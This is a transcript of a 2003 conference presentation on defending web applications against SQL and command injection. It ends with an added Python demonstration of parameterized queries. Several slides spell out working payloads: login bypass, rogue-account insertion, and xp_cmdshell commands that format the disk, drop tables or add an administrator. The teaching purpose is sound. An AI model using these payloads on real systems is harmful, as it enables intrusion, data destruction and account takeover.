Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.

Presentation transcript:

Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003

The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge-based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses.

The OWASP Top-10
1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-Site Scripting (XSS) Flaws
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration

The front door: Any time the user can supply free-form text that will be incorporated directly into a SQL statement. (Login form: Username: / Password:)

How the lock works: ASP/PHP/CGI is used to compose a SQL query: SELECT * FROM tbl_Users WHERE UID='testuser' AND PWD='testpass'

How the lock fails: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'

Going through the broken lock…

Is Account_No really a number?

Going through the broken lock…

'; INSERT INTO tbl_Users VALUES 'newuser', 'password', 'lastname', 'firstname', 'account';--
'; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID='newuser';--

Fun things you can do with a broken lock: SELECT * FROM tbl_Users WHERE UID=''; exec master..xp_cmdshell 'dir c:\ > c:\inetpub\wwwroot\directory.txt';--' AND PWD='' You should then be able to browse to the file you have just created.

Fun things you can do with a broken lock: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1; exec me.';--'

Causing damage: '; shutdown with nowait;-- Get the name of the table by using a "having" clause (' having 1=1;--), then '; drop table tablename;--

Causing damage: how about this: '; exec master..xp_cmdshell 'format c: /q /yes';-- or this: '; exec master..xp_cmdshell 'net user newacct password /add'; exec master..xp_cmdshell 'net localgroup administrators newacct /add';--

What can we do about it:
- Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need.
- Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc.).
- Don't depend on client-side checks.

What can we do about it:
- Redirect the default error messages.
- Move ASP-built SQL queries into stored procedures.
- Check referral URLs.
- Don't give away information for free.
- Keep application logs.
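As an added example (not from the original presentation), the login check from the "How the lock works" and "How the lock fails" slides, first built by string concatenation and then as a parameterized query, plus a strict numeric check for the "Is Account_No really a number?" slide. It uses an in-memory SQLite table as a constructed stand-in for tbl_Users; the column names and sample rows are assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the slides' tbl_Users table (column names assumed).
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE tbl_Users (UID TEXT, PWD TEXT, L_Name TEXT, F_Name TEXT, Account_No INTEGER)"
    )
    con.execute("INSERT INTO tbl_Users VALUES ('jsmith', 's3cret', 'Smith', 'John', 1001)")
    con.execute("INSERT INTO tbl_Users VALUES ('testuser', 'testpass', 'Test', 'User', 1002)")
    return con


def vulnerable_login(con, uid, pwd):
    # The pattern on the slides: user text is pasted straight into the SQL string,
    # so a password of  ' or 1=1;--  turns the WHERE clause into "... AND PWD='' or 1=1"
    # and the trailing quote is commented out, exactly as on the "How the lock fails" slide.
    sql = f"SELECT * FROM tbl_Users WHERE UID='{uid}' AND PWD='{pwd}'"
    return con.execute(sql).fetchone() is not None


def safe_login(con, uid, pwd):
    # Parameterized query: the driver passes the values separately from the SQL text,
    # so quotes, semicolons and '--' in the input are only characters in the password.
    sql = "SELECT * FROM tbl_Users WHERE UID=? AND PWD=?"
    return con.execute(sql, (uid, pwd)).fetchone() is not None


def parse_account_no(text):
    # Allow-list check: accept only a plain decimal integer of bounded length;
    # rejecting everything else is simpler and safer than hunting for bad substrings.
    if not re.fullmatch(r"[0-9]{1,12}", text):
        raise ValueError(f"invalid account number: {text!r}")
    return int(text)


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1;--"
    print("concatenated query, injected password:", vulnerable_login(db, "jsmith", payload))
    print("parameterized query, injected password:", safe_login(db, "jsmith", payload))
    print("account number 1001 parsed as:", parse_account_no("1001"))
```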

Thank You! Questions?